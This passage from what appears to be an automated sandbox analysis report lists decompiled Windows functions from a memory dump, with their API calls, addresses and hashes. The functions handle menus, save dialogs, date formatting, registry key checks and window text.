				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                                                                  0x0040605e
                                                                                                                                                                  0x00406061
                                                                                                                                                                  0x00406069
                                                                                                                                                                  0x00406074
                                                                                                                                                                  0x0040607a
                                                                                                                                                                  0x0040607e
                                                                                                                                                                  0x00406082
                                                                                                                                                                  0x00406148
                                                                                                                                                                  0x0040614e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406088
                                                                                                                                                                  0x00406088
                                                                                                                                                                  0x00406093
                                                                                                                                                                  0x00406098
                                                                                                                                                                  0x0040609f
                                                                                                                                                                  0x004060ae
                                                                                                                                                                  0x004060b6
                                                                                                                                                                  0x004060be
                                                                                                                                                                  0x004060c6
                                                                                                                                                                  0x004060ca
                                                                                                                                                                  0x004060cf
                                                                                                                                                                  0x004060d7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004060de
                                                                                                                                                                  0x00406129
                                                                                                                                                                  0x00406129
                                                                                                                                                                  0x0040612d
                                                                                                                                                                  0x0040612f
                                                                                                                                                                  0x00406130
                                                                                                                                                                  0x00406134
                                                                                                                                                                  0x00406137
                                                                                                                                                                  0x0040613c
                                                                                                                                                                  0x0040613c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040612d
                                                                                                                                                                  0x004060e7
                                                                                                                                                                  0x004060f0
                                                                                                                                                                  0x004060f2
                                                                                                                                                                  0x004060f2
                                                                                                                                                                  0x004060f9
                                                                                                                                                                  0x004060fd
                                                                                                                                                                  0x00406102
                                                                                                                                                                  0x0040610c
                                                                                                                                                                  0x00406112
                                                                                                                                                                  0x00406117
                                                                                                                                                                  0x00406117
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00406102
                                                                                                                                                                  0x00406122
                                                                                                                                                                  0x00406128
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040613f
                                                                                                                                                                  0x0040613f
                                                                                                                                                                  0x00406140
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                                                                  • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                  • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                                                                  • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                  • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                                                                  0x004036ef
                                                                                                                                                                  0x004036f6
                                                                                                                                                                  0x0040370b
                                                                                                                                                                  0x00403712
                                                                                                                                                                  0x00403717
                                                                                                                                                                  0x0040371c
                                                                                                                                                                  0x0040371f
                                                                                                                                                                  0x0040372c
                                                                                                                                                                  0x00403735
                                                                                                                                                                  0x00403738
                                                                                                                                                                  0x00403744
                                                                                                                                                                  0x00403751
                                                                                                                                                                  0x00403758
                                                                                                                                                                  0x00403760
                                                                                                                                                                  0x00403769
                                                                                                                                                                  0x0040376c
                                                                                                                                                                  0x00403778
                                                                                                                                                                  0x0040377b
                                                                                                                                                                  0x0040378b
                                                                                                                                                                  0x00403792
                                                                                                                                                                  0x00403795
                                                                                                                                                                  0x00403798
                                                                                                                                                                  0x0040379b
                                                                                                                                                                  0x004037a2
                                                                                                                                                                  0x004037a5
                                                                                                                                                                  0x004037a8
                                                                                                                                                                  0x004037af
                                                                                                                                                                  0x004037b7
                                                                                                                                                                  0x004037c3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004037d4
                                                                                                                                                                  0x004037dc

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004036F6
                                                                                                                                                                  • memset.MSVCRT ref: 00403712
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                    • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                                                                    • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                                                                  • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004037C3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                  • String ID: L$cfg
                                                                                                                                                                  • API String ID: 275899518-3734058911
                                                                                                                                                                  • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                  • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                                                                  • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                                                                  0x00404ed0
                                                                                                                                                                  0x00404edf
                                                                                                                                                                  0x00404ef6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404f00
                                                                                                                                                                  0x00404f1c
                                                                                                                                                                  0x00404f31
                                                                                                                                                                  0x00404f41
                                                                                                                                                                  0x00404f4e
                                                                                                                                                                  0x00404f5d
                                                                                                                                                                  0x00404f66
                                                                                                                                                                  0x00404f69
                                                                                                                                                                  0x00404f69
                                                                                                                                                                  0x00404f71
                                                                                                                                                                  0x00404f77
                                                                                                                                                                  0x00404f7d

                                                                                                                                                                  APIs
                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404F41
                                                                                                                                                                  • wcscat.MSVCRT ref: 00404F4E
                                                                                                                                                                  • wcscat.MSVCRT ref: 00404F5D
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404F71
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1331804452-0
                                                                                                                                                                  • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                  • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                                                                  • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                  • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                  			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                                                                  0x00402ed7
                                                                                                                                                                  0x00402eee
                                                                                                                                                                  0x00402ef8
                                                                                                                                                                  0x00402f00
                                                                                                                                                                  0x00402f01
                                                                                                                                                                  0x00402f05
                                                                                                                                                                  0x00402f0a
                                                                                                                                                                  0x00402f1a
                                                                                                                                                                  0x00402f30

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 19018683-0
                                                                                                                                                                  • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                  • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                                                                  0x00404683
                                                                                                                                                                  0x00404692
                                                                                                                                                                  0x00404699
                                                                                                                                                                  0x0040469b
                                                                                                                                                                  0x004046af
                                                                                                                                                                  0x004046ba
                                                                                                                                                                  0x004046bc
                                                                                                                                                                  0x004046c7
                                                                                                                                                                  0x004046cc
                                                                                                                                                                  0x004046cd
                                                                                                                                                                  0x004046ee
                                                                                                                                                                  0x004046f3
                                                                                                                                                                  0x004046fa
                                                                                                                                                                  0x004046fa
                                                                                                                                                                  0x004046ee
                                                                                                                                                                  0x00404705

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004046AF
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen_snwprintfmemset
                                                                                                                                                                  • String ID: %s\shell\%s
                                                                                                                                                                  • API String ID: 1458959524-3196117466
                                                                                                                                                                  • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                                                                  • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                                                                  • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                                                                  • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                                                                  0x00403a7d
                                                                                                                                                                  0x00403a8c
                                                                                                                                                                  0x00403a9c
                                                                                                                                                                  0x00403aba
                                                                                                                                                                  0x00403adf
                                                                                                                                                                  0x00403ae7
                                                                                                                                                                  0x00403af4
                                                                                                                                                                  0x00403af4
                                                                                                                                                                  0x00403ae7
                                                                                                                                                                  0x00403aba
                                                                                                                                                                  0x00403a9c
                                                                                                                                                                  0x00403b13

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                                                                    • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                                                                  • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: State$CallMessageProcSendWindow
                                                                                                                                                                  • String ID: A
                                                                                                                                                                  • API String ID: 3924021322-3554254475
                                                                                                                                                                  • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                  • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                  • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                                                                  0x00407e2d
                                                                                                                                                                  0x00407e46
                                                                                                                                                                  0x00407e48
                                                                                                                                                                  0x00407e4d
                                                                                                                                                                  0x00407e5f
                                                                                                                                                                  0x00407e6b
                                                                                                                                                                  0x00407e6f
                                                                                                                                                                  0x00407e75
                                                                                                                                                                  0x00407e7c
                                                                                                                                                                  0x00407e7d
                                                                                                                                                                  0x00407e88
                                                                                                                                                                  0x00407e8d
                                                                                                                                                                  0x00407e8e
                                                                                                                                                                  0x00407eaa

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00407E48
                                                                                                                                                                  • memset.MSVCRT ref: 00407E5F
                                                                                                                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                                                  • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                  • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                  • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                                                                  0x00405e0a
                                                                                                                                                                  0x00405e12
                                                                                                                                                                  0x00405e18
                                                                                                                                                                  0x00405e1c
                                                                                                                                                                  0x00405e1e
                                                                                                                                                                  0x00405e1e
                                                                                                                                                                  0x00405e24
                                                                                                                                                                  0x00405e2c
                                                                                                                                                                  0x00405e2e
                                                                                                                                                                  0x00405e44
                                                                                                                                                                  0x00405e49
                                                                                                                                                                  0x00405e4c
                                                                                                                                                                  0x00405e4d
                                                                                                                                                                  0x00405e68
                                                                                                                                                                  0x00405e74
                                                                                                                                                                  0x00405e74
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405e84
                                                                                                                                                                  0x00405e8c

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                  • String ID: caption
                                                                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                                                                  • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                  • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                                                                  • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
